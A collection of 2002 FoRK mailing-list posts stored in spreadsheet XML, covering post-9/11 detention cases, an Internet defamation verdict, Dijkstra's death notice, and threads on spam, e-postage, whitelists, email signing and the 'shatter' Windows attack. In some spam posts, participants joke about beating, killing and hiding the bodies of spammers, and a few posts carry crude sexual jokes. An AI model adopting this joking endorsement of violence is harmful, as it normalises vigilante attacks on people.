material witnesses, perhaps as few as two, are still being
detained. But the process of detaining the witnesses has stirred
intense criticism. Last April, Judge Shira A. Scheindlin of Federal District
Court in Manhattan ruled that the use of the law "to detain
people who are presumed innocent under our Constitution in
order to prevent potential crimes is an illegitimate use of
the statute." Judge Scheindlin said the material witness law applied when
witnesses were held to give testimony at trials, not for
grand jury investigations. "Since 1789," Judge Scheindlin
said, "no Congress has granted the government the authority
to imprison an innocent person in order to guarantee that
he will testify before a grand jury conducting a criminal
investigation." Then last month, Chief Judge Michael B. Mukasey, also of
Federal District Court in Manhattan, upheld the
government's use of the material witness statute in grand
jury investigations, criticizing Judge Scheindlin's
reasoning. Judge Mukasey, citing the assertion in 1807 by Chief
Justice John Marshall that "the public has a right to every
man's evidence," held that detentions of material witnesses
during investigations are proper. The War Captives No Lawyers Allowed 
Under U.S. Label Yasser Esam Hamdi, a
Saudi national who was captured in Afghanistan, is probably
an American citizen by virtue of having been born in
Louisiana. His case represents the core issue of what kind
of role the nation's courts should have, if any, in
reviewing the government's imprisonment of someone charged
with something akin to a war crime. Prosecutors will be back in Federal District Court in
Norfolk, Va., next Thursday to confront one of the federal
judges who has shown resistance to the government's
approach that once someone is declared an "enemy combatant"
by the president, all judicial review ceases. Judge Robert G. Doumar, an appointee of President Reagan,
has twice ruled that Mr. Hamdi is entitled to a lawyer and
ordered the government to allow Frank Dunham, the federal
public defender, to be allowed to visit him without
government officials or listening devices. Judge Doumar
said that "fair play and fundamental justice" require it.
He said the government "could not cite one case where a
prisoner of any variety within the jurisdiction of a United
States District Court, who was held incommunicado and
indefinitely." But the three-judge panel of the appeals court stayed Judge
Doumar's order, saying he had not fully considered the
government's needs to keep Mr. Hamdi incommunicado and,
more important, the executive branch's primacy in areas of
foreign and military affairs. "The authority to capture those who take up arms against
America belongs to the commander in chief," Chief Judge J.
Harvie Wilkinson 3rd wrote for the appeals panel. But even Judge Wilkinson seemed to evince some surprise at
the breadth of what the government was asserting when he
asked the Justice Department's lawyer, "You are saying that
the judiciary has no right to inquire at all into someone's
stature as an enemy combatant?" The government has relented slightly, agreeing to provide
the court with a sealed declaration of the criteria by
which they have judged Mr. Hamdi to be an enemy combatant.
But the government has argued that judges cannot argue with
the standards. Judge Doumar has indicated that he will question the
government closely on those standards. The case of Jose Padilla, which has not progressed as far
as that of Mr. Hamdi, may present an even greater challenge
to normal judicial procedures. Mr. Padilla, also known as Abdullah al-Muhajir, is, like
Mr. Hamdi, an American citizen, imprisoned in a naval brig
after having been declared an enemy combatant. But unlike
Mr. Hamdi, Mr. Padilla was not arrested on the battlefield
by the military but on United States soil by civil law
enforcement authorities, on May 8 in Chicago. After his detention as a material witness based on
suspicions that he was seeking to obtain material and
information to build a radioactive bomb, he was transferred
to military custody. "This is the model we all fear or should fear," said Mr.
Dunham, the public defender. "The executive branch can
arrest an American citizen here and then declare him an
enemy combatant and put him outside the reach of the
courts. They can keep him indefinitely without charging him
or giving him access to a lawyer or presenting any
evidence."http://www.nytimes.com/2002/08/04/national/04CIVI.html?ex=1029550865&amp;ei=1&amp;en=c82350bcf915e44eHOW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http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
To: rah@philodox.com
Subject: Internet Defamation Suit Ends With Defense Verdict
Date: Mon,  5 Aug 2002 10:08:41 -0400 (EDT)
From: SomebodyInternet Defamation Suit Ends With Defense Verdicthttp://www.law.com/servlet/ContentServer?pagename=OpenMarket/Xcelerate/View&amp;c=LawArticle&amp;cid=1028320303259&amp;t=LawArticleTechJohn Council
Texas Lawyer 08-05-2002In one of the first trials in the country to
address Internet defamation, a Dallas County,
Texas, jury last week rejected a $700 million
suit by an Internet company that claimed it
was harmed by negative electronic messages
posted by an employee of a competing company.ZixIt, a Dallas Internet company, filed ZixIt
Corp. v. Visa International, et al. in 1999,
alleging it was harmed by Paul Guthrie, then
a vice president with Visa. ZixIt alleged in
its suit that Guthrie posted more than 400
anonymous messages, many of them negative,
about ZixIt on the Yahoo Finance ZixIt Internet
message board, causing ZixIt's stock price to
drop.The suit also alleged that the postings
destroyed the company's ability to market
its ZixCharge Internet transaction
authorization system, which allows consumers
to make purchases without revealing their
credit card numbers to merchants. Visa has
a similar Internet payment system.ZixIt alleged that the postings caused its
stock price to plummet. Had the product
been successful, the company believed it
would have been worth more than $1 billion,
according to lawyers involved in the case.On July 31, a jury in Judge Merrill Hartman's
192nd District Court found that ZixIt's
product was not harmed by the postings.Neal Manne and Kenneth McNeil, lawyers from
Houston's Susman Godfrey who represented
ZixIt at trial, did not return calls for
comment by press time."The company hasn't made any decision about
an appeal," says Cindy Lawrence, a ZixIt
spokeswoman. "The outcome of the lawsuit
doesn't have any effect on our future
products and services in e-messaging."GETTING GRADEDVisa's lawyers alleged that Guthrie acted on
his own and had a right to free speech, and
that Guthrie's Internet postings had no
effect on ZixIt's stock. Guthrie has since
left Visa, lawyers for the company say.
Guthrie was not a defendant in the case.
However, his interests in the case were
represented by Todd Noonan, an attorney in
Sacramento, Calif.'s Stevens &amp; O'Connell.
Noonan was recovering from surgery last
week and was unavailable for comment."I think people believe whether you
succeed or fail [is] because of what you
do and not what other people do to you.
Internet companies didn't succeed for all
sorts of reasons," says Jeff Tillotson, a
partner in Dallas' Lynn, Tillotson &amp; Pinker,
who defended Visa at trial.ZixIt's case was a hard sell to the jury,
especially with the reality of the economy,
Tillotson says."Everyone knows that the stock market
has fallen and the trouble with Internet
companies. I think the jury took that into
account," Tillotson says.There were lessons to be learned from the
Internet defamation trial, says Mike Lynn,
who also represented Visa at trial. Even
though message boards are considered a
protected form of free speech, that freedom
won't prevent a company from being dragged
into court if its employee blasts another
company on the Internet, Lynn says."A company can be responsible for what an
employee posts on a message board," Lynn
says. "The courts have said you're entitled
to go to a jury to determine whether there
are damages as a result of that. The law is
very odd, not mature, [and] damage theories
are not mature."The nature of the case also added an
interesting twist to the trial, Tillotson
says. Many of those who posted messages on
the board attended the trial and posted
comments about the daily proceedings
throughout the three-week trial, he says."It was apparent to everyone that many of
the people who posted on these message boards
were watching the trial," Tillotson says.
"It really was wild. The lawyers felt like
they were being graded."-- ---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</si>
  <si>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
So I see a headline which reads:
"Microsoft Outlining Settlement Plans"
and my initial reaction is to wonder
if West Jerusalem should worry that
Redmond will beat them to embracing
the West Bank.-Davehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Begeman's _Manufacturing Processes_
talks about Quality Control Charts:&gt; The tolerance limits for a part are placed outside of the control
&gt; limits and are never inside of them.  Once the control chart has
&gt; been established, data is recorded on it and it becomes a record
&gt; of the variation of an inspected dimension over a period of time.
&gt; The data plotted should fall in random fashion between the control
&gt; lines, if all assignable causes for variation are absent.  When the
&gt; data fall in this manner, it can be assumed that the part is being
&gt; made correctly 99.73% of the time; that is, no more than 3 out of
&gt; 1000 will leave the process incorrectly made.Taking a look at the S&amp;P 500, and 
using the Ibbotson 2000 figures of
13% expected stock return and 20%
standard deviation, and taking the
the actual 2.5 year return on the
S&amp;P since 31 Dec 1999 to be close
to -30%, we find:-.30 ? 2.5*(.13) - 3*sqrt(2.5)*(.20)
-30% &gt; -60%so it still plots out between the
control lines ...&gt; So long as the points fall between the control lines, no adjustments
&gt; or changes in the process are necessary.  If five to seven points fall
&gt; on one side of the mean, the process should be checked.  When points
&gt; fall outside of the control lines, the cause must be located and
&gt; corrected immediately.... but maybe we should've checked
the process during the "long" bull.-Davehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">--------------------------------------------------------------------------What is MIME?MIME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/rfc/rfc1521.txtAnother source of information is the Internet news group "comp.mail.mime",
which includes a periodic posting of a "Frequently Asked Questions" list.--------------------------------------------------------------------------
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Seems like Edsger W. Dijkstra has passed away.------- Forwarded MessageFrom: "Edsger W. Dijkstra" 
Subject: from the family
Cc: faculty@cs.utexas.edu
version=2.20
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Grateful for most that has befallen him, has peacefully passed away,
   Edsger Wybe Dijkstra,
our husband and father.We hold him very dear.The cremation will take place onSaterday, August 10th, 12:30 PM at
Somerenseweg 120
Heeze
the NetherlandsMaria C. Dijkstra Debets
Marcus J. Dijkstra
Femke E. Dijkstra
Rutger M. DijktraPlease forward this message to whomever you feel missing in the recipient list.------- End of Forwarded Message
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley  writes:    R&gt; 'Scuse me for posting in Greek.  :)Better you than me, but I'm sure we all share in your joy.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 7 Aug 2002, Robert Harley wrote:&gt; Hmm... now I have an asymptotically faster precomputation algorithmWoo, faster is better... But what have you done about all those patents that
prevent anyone from going near ECC in the first place, hmmmmmm?- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Keep your fingers crossed...Exhausted Britney 'wants to quit music'http://www.thisislondon.com/dynamic/news/story.html?in_review_id=661754&amp;in_review_text_id=632865
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">In a message dated Wed, 7 Aug 2002 5:17:55 PM Eastern Standard Time, beberg@mithral.com writes:&gt; 
&gt; 
&gt; On Wed, 7 Aug 2002, Robert Harley wrote:
&gt; 
&gt; &gt; Hmm... now I have an asymptotically faster precomputation algorithm
&gt; 
&gt; Woo, faster is better... But what have you done about all those patents that
&gt; prevent anyone from going near ECC in the first place, 
&gt; hmmmmmm?
&gt; 
&gt; - Adam L. "Duncan" BebergSomething tells me Adam's security blanket was very wet and that Adam had a propensity for throwing it on his stuffed animals.Geege
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Sounds like the land of UNIX for the PC (Politically Correct) still has 
some ways to go in becoming UNIX for the Rest of Us...Quoted from Mac OS X man page for sudoers(5):
&gt;
&gt;        insults     If set, sudo will insult users when they enter
&gt;                    an incorrect password.  This flag is off by
&gt;                    default.
&gt;Hey, at least Apple set the default to no-insults! :-)Rohit---
My permanent email address is khare@alumni.caltech.eduhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Don't get your hopes up.   This a career move.   Next stop Hollywood.
Remember Madonna, The Actress?Eirikur
On Wednesday 07 August 2002 06:56 pm, John Evdemon wrote:
&gt; Keep your fingers crossed...
&gt; Exhausted Britney 'wants to quit music'http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Has anyone had much positive experience with PKI based smartcards, email 
(S/Mime interoperability), programming to smart cards, etc.?One area in particular that seems surprising is that a number of 
projects are using cards like the Datakey 330 which seems to store data 
in a way that is proprietary to particular card/reader driver versions.I've been told, on the other hand, that Java PKI smart cards are very 
interchangable and upward compatible.  The only reasons I've been able 
to find so far for using the more 'proprietary' cards is that they may 
be cheaper and further along in FIPS validation.sdw-- 
sdw@lig.net http://sdw.st
Stephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622
703-724-0118W 703-995-0407Fax Dec2001http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.techcentralstation.com/1051/printer.jsp?CID=1051-080802A&gt;Mail Me the Money!
&gt;By David Friedman 08/08/2002David is a very bright fellow. But this time he's
several years behind. The idea of using epostage
to stop spam has been discussed quite a bit. The
problem is how to get over the adoption hump.
Until most people are taking one form of epostage,
most people don't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doesn't automatically put them in my white list.Hashcash tries to lower the adoption barrier by
removing the need to pay money for epostage.
Instead, the sender burns processing time on his
computer, answering a cryptographically hard
challenge. But even this requires set-up. There is
inadequate incentive to do so until there is a
standard mechanism, but no standard mechanism is
born until a significant fraction of the market
has taken that first step. It may take government
action, to institute an effective epostage
standard!I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Machine."It will be a long time before spammers have a
process that defeats millions of personal
challenges. On the other hand, I have a hack in
mind that would work a large percentage of the
time. But I'm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sub-par, which
is their natural prey. People like David aren't
in the market for herbal Viagra or back alley
debt consolidation.Since David is an anarchist, I'm surprised he
didn't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 your photos: 
http://photos.msn.com/support/worldwide.aspxhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Not that I particuarly enjoy these religious wars, but...Adam L. Beberg wrote:&gt;My PC at least crashes a few times a day...
&gt;Linux, dude, linux...
Eliashttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">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vocabulary.Not that this is important, but I've inadvertently adopted "muta" into
my version of the English language as the word for "eye goop".  Arguably
better than "smegma" anyway.(Definitely Friday...)-James Rogers
 jamesr@best.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
I'm sure this is common knowledge already, but just in case ...http://security.tombom.co.uk/shatter.html   This paper presents a new generation of attacks against Microsoft
   Windows, and possibly other message-based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Allchin's comments, it is about time the white hat
   community saw what is actually possible.
-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy wrote&gt;&gt;&gt;&gt;&gt;&gt;"R" == Russell Turpin  writes:
&gt;&gt;&gt;&gt;&gt;&gt;
&gt;
&gt;    R&gt; ... spam is the result of government. The government is
&gt;    R&gt; ineffective at preventing spam, but it DOES prevent individuals
&gt;    R&gt; and ISPs from taking retribution against spammers.
&gt;
&gt;I don't understand this assertion.  Can you explain?
&gt;...
&gt;So where does government come in to foster this?
&gt;
The government prevents me from hunting them down and flossing with 
their sinew after I'm done with them. Sometimes I wish for a return to 
the common sense laws of the old west... "You used my inbox without my 
permission varmit, and now yer gonna pay!"
Eliashttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Tom wrote:&gt;... its a word that deserves a place in the daily vernacular,
&gt;much like squick, schmegma, and dork.
&gt;
Don't forget slithy, mimsy, gimble, and frumious, bequeathed to us by 
Lewis Carol...
Eliashttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Be sure to read the followups on 
http://online.securityfocus.com/archive/1/286228/2002-08-03/2002-08-09/1
where basically the consensus is that the article author is that this is
(1) an application problem, not a Windows problem and (2) a problem only
a certain class of poorly written applications. So, yeah, it's a new
attack, but it's not nearly as devastating an MS critique as the author
wants us to believe it is.LuisOn Fri, 2002-08-09 at 13:08, Gary Lawrence Murphy wrote:
&gt; 
&gt; I'm sure this is common knowledge already, but just in case ...
&gt; 
&gt; http://security.tombom.co.uk/shatter.html
&gt; 
&gt;    This paper presents a new generation of attacks against Microsoft
&gt;    Windows, and possibly other message-based windowing systems. The
&gt;    flaws presented in this paper are, at the time of writing,
&gt;    unfixable. The only reliable solution to these attacks requires
&gt;    functionality that is not present in Windows, as well as efforts on
&gt;    the part of every single Windows software vendor. Microsoft has
&gt;    known about these flaws for some time; when I alerted them to this
&gt;    attack, their response was that they do not class it as a flaw -
&gt;    the email can be found here. This research was sparked by comments
&gt;    made by Microsoft VP Jim Allchin who stated, under oath, that there
&gt;    were flaws in Windows so great that they would threaten national
&gt;    security if the Windows source code were to be disclosed. He
&gt;    mentioned Message Queueing, and immediately regretted it. However,
&gt;    given the quantity of research currently taking place around the
&gt;    world after Mr Allchin's comments, it is about time the white hat
&gt;    community saw what is actually possible.
&gt; 
&gt; 
&gt; -- 
&gt; Gary Lawrence Murphy  TeleDynamics Communications Inc
&gt; Business Innovations Through Open Source Systems: http://www.teledyn.com
&gt; "Computers are useless.  They can only give you answers."(Pablo Picasso)
&gt; 
&gt; http://xent.com/mailman/listinfo/fork
&gt; http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9 Aug 2002, James Rogers wrote:--]my version of the English language as the word for "eye goop".  Arguably
--]better than "smegma" anyway.Unless of course the goop in your eye was a result of a botched tea
bagging.Muta, I like that.-tomhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Elias Sinderson  writes:    E&gt; Gary Lawrence Murphy wrote
    &gt;&gt;&gt;&gt;&gt;&gt;&gt; "R" == Russell Turpin  writes:
    &gt;&gt;&gt;&gt;&gt;&gt;&gt; 
    &gt;&gt;
    R&gt; ... spam is the result of government. The government is
    R&gt; ineffective at preventing spam, but it DOES prevent individuals
    R&gt; and ISPs from taking retribution against spammers.    &gt;&gt;  I don't understand this assertion.  Can you explain?  ...  So
    &gt;&gt; where does government come in to foster this?
    &gt;&gt; 
    E&gt; The government prevents me from hunting them down and flossing
    E&gt; with their sinew after I'm done with them. This only restates the assertion, it doesn't clarify /how/ government
restrains you, other than under laws of criminal conduct and violent
crimes (if you meant the above literally)If I can trace a spammer to their ISP, I can /generally/ get that
account revoked, and if you trace one to their parent corporation, I
don't know of any law that specifically /exempts/ them from lawsuits,
it's just that no one has yet succeeded in any important way.  If you
have some law that prevents action against spammers, then why all the
class-action suits and other anti-spam court cases, some even
state-funded?I'm also curious of the mechanics of your retribution strategy: Let's
say you did win a lawsuit and shut down the largest spammer network in
the USA, do you really believe 40 Beijing spammers won't fill the
void?  Do you really believe those 40 are not right now prepping their
mail servers whether or not you prevail over your countrymen? How do
you intend to take legal (and/or violent) action against people a
world away and in a culture you can barely understand let alone
understand how to properly bribe?  I'm not so hopeful this method can work against aromatherapy viagra
when we can't even track and convict murderous Nigerian mafia, and
they are blatant!  Political solution is a contradiction in terms, and
it's also true that no lawmaker has ever been even a tenth the
catalyst on improving the quality of life in Britain and the western
world as did central heating and the invention of one A.J.Crapper.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy:
&gt;Back before they had such clever software, I used to hunt spammers like 
&gt;swamp-rats ..Good for you! You did the world a favor. Personally,
I wouldn't know where to hide the bodies. But if
the government didn't have this -- um, fussiness --
about shooting vermin, the spam problem would
disappear rather quickly.
_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "L" == Luis Villa  writes:    L&gt; ... So, yeah, it's a new attack, but it's not nearly as
    L&gt; devastating an MS critique as the author wants us to believeGood to know ... not being an MS user, I have no means to evaluate
these things so it's best to get a second opinion ;)Besides, I shudder to think of the pandemonium that would ensue if we
had to /deploy/ the present states of Lycoris or Lindows in it's
stead!  As the Big Joe Williams song goes, "Next week, sometime, but
no, not now."-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">James Rogers:
&gt;I don't think there is a specific word in English
&gt;for eye goop."Sleep. n. .. 3. A crust of dried tears or mucus
normally forming around the inner rim of the eye
during sleep."But I think muta is a fine word for it._________________________________________________________________
Join the worldï¿½s largest e-mail service with MSN Hotmail. 
http://www.hotmail.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Murphy:
&gt;How do you intend to take legal (and/or violent) action against people a 
&gt;world away and in a culture you can barely understand let alone
&gt;understand how to properly bribe? I'm not so hopeful this method can work 
&gt;against aromatherapy viagra when we can't even track and convict murderous 
&gt;Nigerian mafia, and they are blatant!Spammers fall into two categories. The more
difficult case are those whose back-end business
can be executed entirely in a foreign nation, such
as the 419 spammers. And you're right: there's not
much we can do about those, except filter them in
various ways. But the vast majority of spammers
have a back-end business that requires a native
presence. Debt consolidation. Mortgages. Herbalife
and other MLMs. Even porn sites require credit
card transactions. That means the people responsible
CAN be found.&gt;I don't know of any law that specifically /exempts/ them from lawsuits, 
&gt;it's just that no one has yet succeeded in any important way.There have been some successful suits, but (a) it
takes too much effort, and (b) the result isn't enough
to deter the spammer. But you're talking about action
constrained by law. In an anarchy, people act more
directly, with less cost, and to more effect. Spammers
very quickly would learn their lesson. Except for the
ones who ply their scam in a foreign country.Of course, that's assuming there are ISPs and other
infrastructure in an anarchy. Arguing about how things
would work without the state involves a large degree
of counterfactual reasoning.&gt;no lawmaker has ever been even a tenth the catalyst on improving the 
&gt;quality of life in Britain and the western world as did central heating and 
&gt;the invention of one A.J.Crapper.Hmm. I've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http://photos.msn.com/support/worldwide.aspxhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; James Rogers:
&gt; &gt;I don't think there is a specific word in English
&gt; &gt;for eye goop.
&gt; 
&gt; "Sleep. n. .. 3. A crust of dried tears or mucus
&gt; normally forming around the inner rim of the eye
&gt; during sleep."
&gt; 
&gt; But I think muta is a fine word for it.Muta is good but if Bukkake is not eye goop, then what is? B
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9 Aug 2002, Gary Lawrence Murphy wrote:&gt; This only restates the assertion, it doesn't clarify /how/ government
&gt; restrains you, other than under laws of criminal conduct and violent
&gt; crimes (if you meant the above literally)Of course. What we need is an anonymous betting pool on prominent 
spammer's time of demise. Unfortunately, the government tends to take a 
dim view of this, for some unfathomable reason.&gt; If I can trace a spammer to their ISP, I can /generally/ get that
&gt; account revoked, and if you trace one to their parent corporation, IUh, account revokation doesn't have quite the same level of deterrence as 
cranial indentation with a heavy, blunt object. Honestly, how many people 
will still spam if they knew they'd be running a real risk of losing life 
and limb?
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">My ideal mailwall will allow message passthrough in many ways:  - Sender membership on my personal whitelist or any one of 
    many other external whitelists I respect
  - Payment of a small fee (via a website and PayPal link)
  - Demonstration of special per-message effort, either 
    via...
    - a computational challenge (hashcash)
    or
    - other challenge that requires human-level flexibility &amp; 
      followthrough (sender manual whitelisting)
  - Inclusion of a legally-enforceable guarantee that the
    mail is not an unsolicited commercial pitch -- one
    example of this class of guarantee would be a posted
    bond
  - By convincing some analysis software agent of mine that
    I want to see the mail, based on its content and 
    distribution listThere's no need to do only one. Some might overlap; the manual
process for passing a message through might require the assertion
of a legally-enforceable guarantee about the messages' contents.
Passing certain tests once might add an address to the persistent
whitelist.Any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religious/political 
zealots) would get through, but such traffic should be a 
background trickle rather than an annoying torrent.- Gordon
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Russell Turpin  writes:    R&gt; Hmm. I've lived most of my life in houses that did not have
    R&gt; central heating, including my current abode.  As to the
    R&gt; crapper, it did not do nearly as much to improve waste
    R&gt; management in cities as did the public sewers which it feeds,
    R&gt; and the water lines that supply it. Without these, you would
    R&gt; find that a chamber pot works just as well.The particulars may be negotiable, but even in your list there is not
one _political_ solution, only technical ones. QED.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">At 6:21 PM +0000 on 8/9/02, Russell Turpin wrote:
&gt;  Personally,
&gt; I wouldn't know where to hide the bodies. But if
&gt; the government didn't have this -- um, fussiness --
&gt; about shooting vermin, the spam problem would
&gt; disappear rather quickly....which reminds me of my favorite David Friedman quote.See below...Cheers,
RAH
-- 
-----------------
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"The direct use of physical force is so poor a solution to the problem of
limited resources that it is commonly employed only by small children and
great nations." -- David Friedman, _The_Machinery_of_Freedom_http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy:
&gt;This is for the whitelist fans: Can someone please tell us why the 
&gt;following extremely frequent spam header pattern would _not_ pass a 
&gt;whitelist test? The letter itself is most certainly spam/viral and
&gt;was most certainly not sent by me, but I see no way you might tell that it 
&gt;was not, nor can I see how I might charge the sender with fraud for having 
&gt;'impersonated' my account. .. My uneducated guess  is that all they need to 
&gt;jump expensive whitelist
&gt;walls would be buckshot a spam-laden Klez ..There are several issues here.(1) For reasons that have nothing to do with
commercial advertising, we need email software that
prevents virus attacks a la Melissa and Klez. We
simply can't continue down the path where every
script kiddie with a grudge or political agenda can
cause millions or billions of dollars worth of
damage.(2) Very likely, email practices will evolve to the
point that digital signatures are the standard way
to recognize the sender of a message. Sabotaging
your machine or otherwise compromising your private
key will be the only way that someone can forge a
message from you. I don't see any reason that email
software that automatically uses digital signatures
for contact management and whitelisting would be
any more expensive than existing email clients.
Unless Microsoft manages to get a defacto monopoly
on it.(3) I think identity theft should be made a felony,
with very stiff penalties, for reasons that have
nothing to do with spam. No, obviously, simply
parading around with a sign that says "I'm George
Bush" is not identity theft. On the other hand,
I think using a virus to compromise someone else's
private key should should fall into that category.
_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspxhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy writes:
&gt; This is for the whitelist fans: Can someone please tell us why the
&gt; following extremely frequent spam header pattern would _not_ pass a
&gt; whitelist test?  The letter itself is most certainly spam/viral and
&gt; was most certainly not sent by me, but I see no way you might tell
&gt; that it was not, nor can I see how I might charge the sender with
&gt; fraud for having 'impersonated' my account.  If you crypto-sign your outgoing mail, you don't have to set 
your mailwall whitelist to accept unsigned mail spoofed as being 
from you. Similarly, if you include some weaker token or checksum that
spammers can't easily guess. If you can track the actual sender, then the proof that they've
committed identity fraud is your credible testimony that you
are the rightful user of the declared originating address, and
that you did not send the message. I'm not sure what level of
damages you could claim, though.- Gordon
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 8 Aug 2002, Adam L. Beberg wrote:--]Yea, Apple sucks, my crappy iMac hasn't crashed once in 2 years.When all you do on it is pout on emaillists and watch asain bukaky porn
wheres the strain?Striken as anecdotal...oh and I had a win98 box running wsmf server stuffs
(apache, dbs, shoutcast etc) up on dsl without so much as a hicup for over 1.5 years
other than the various game realted hijinks tribes would pull. So if its
raw uptime ou want,....tools and craftsman time. Thus once again uptime
fawl down go boom.-tomhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On 10 Aug 2002, Gary Lawrence Murphy wrote:&gt; My uneducated guess is that all they need to jump expensive whitelist
&gt; walls would be buckshot a spam-laden Klez with a 5-million-addresses
&gt; mailer; if it finds just one vulnerable host on an Exchange server,
&gt; through hopping addressbooks across a few degrees of freedom, a world
&gt; of whitelists are instantly breechable.You seem to be saying that whitelists are useless, because there are worms
which can compromise your system, read your address book/whitelist, and
sent themselves on, compromising a nonnegligible fraction of systems as
they go along. While mailing lists can be spam/worm amplifiers, I don't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first).http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 11 Aug 2002, Gordon Mohr wrote:&gt; If you crypto-sign your outgoing mail, you don't have to set your
&gt; mailwall whitelist to accept unsigned mail spoofed as being from you.Users don't like entering passphrases when sending email. USB fobs, smart 
cards or other removable hardware are not yet widespread.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Eugene Leitl:
&gt;Users don't like entering passphrases when sending email.If you're using the mail client on your personal
machine, there's no reason you would need to enter
a passphrase, unless that is part of how you secure
the data on your personal machine. You're private
key is as secure as any other data on your machine.
If you're working remotely, you already have to
enter a passphrase to get to your email.
_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 11 Aug 2002, Russell Turpin wrote:&gt; If you're using the mail client on your personal
&gt; machine, there's no reason you would need to enter
&gt; a passphrase, unless that is part of how you secure
&gt; the data on your personal machine. You're privateThe original comment's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place?)&gt; key is as secure as any other data on your machine.
&gt; If you're working remotely, you already have to
&gt; enter a passphrase to get to your email.A passphrase is a (long, secure) password unlocking (decrypting) your 
keyring. You don't use a passphrase to read your email. Unless it resides 
on a crypto file system.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Eugen Leitl  writes:    E&gt; ... Moreover, worms which use email as vector exist *only*
    E&gt; because a single vendor ships mailers with broken default
    E&gt; settings, and insists to make documents executables. This makes
    E&gt; for very bad press, and eventually that vendor is going to wise
    E&gt; up, and stop shipping as many broken waresDo you suppose any of us will live long enough to see such a day?-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Eugene Leitl:
&gt;The original comment's context was digital signatures. A digital signature 
&gt;is worth sqrat if any userspace app or rogue superuser code can grab your 
